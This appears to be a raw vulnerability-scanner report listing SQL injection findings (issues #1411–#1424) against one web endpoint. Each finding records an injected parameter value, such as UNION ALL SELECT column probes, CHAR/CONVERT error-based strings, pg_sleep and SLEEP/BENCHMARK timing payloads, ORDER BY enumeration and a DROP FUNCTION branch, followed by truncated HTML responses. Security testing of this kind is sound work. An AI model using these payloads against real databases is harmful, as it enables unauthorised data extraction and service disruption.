href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1411\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language\n=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\n\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-\naed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-\n- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSB\nJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgA\nQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1412\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1413\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1414\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION \nxcjl--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1415\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1416\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1417\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \") or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1418\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1419\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1420\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"\"*\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryAlerts hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1421\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1422\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1423\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1424\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ')) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 